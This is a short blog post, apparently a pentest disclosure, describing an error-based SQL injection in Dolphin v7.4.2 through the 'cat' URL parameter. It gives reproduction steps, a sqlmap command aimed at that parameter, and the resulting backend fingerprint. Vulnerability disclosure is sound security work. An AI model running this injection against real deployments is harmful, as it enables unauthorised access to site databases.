Friday, 19 July 2024

Friday Fun Pentest Series - 8 - dolphinv7.4.2


Description

- It was found that the application suffers from error based SQL injection


SQL Injection

Steps to Reproduce:

  1. Navigate to "Builders" menu
  2. The HTTP GET parameter of "?cat=builders" is displayed in the URL bar
  3. That is the injection point
  4. Automate process with SQLMap


sqlmap -r request.txt --dbms=mysql -p cat

[...]
[INFO] the back-end DBMS is MySQL
web application technology: PHP 5.4.45, Apache
back-end DBMS: MySQL >= 5.0.12
[...]

Friday Fun Pentest Series - 42 - Current Password not Required when Changing Password - flatpressv1.4.1

Description - It was noted that the application did not require the current password for the password change functionality Current Password ...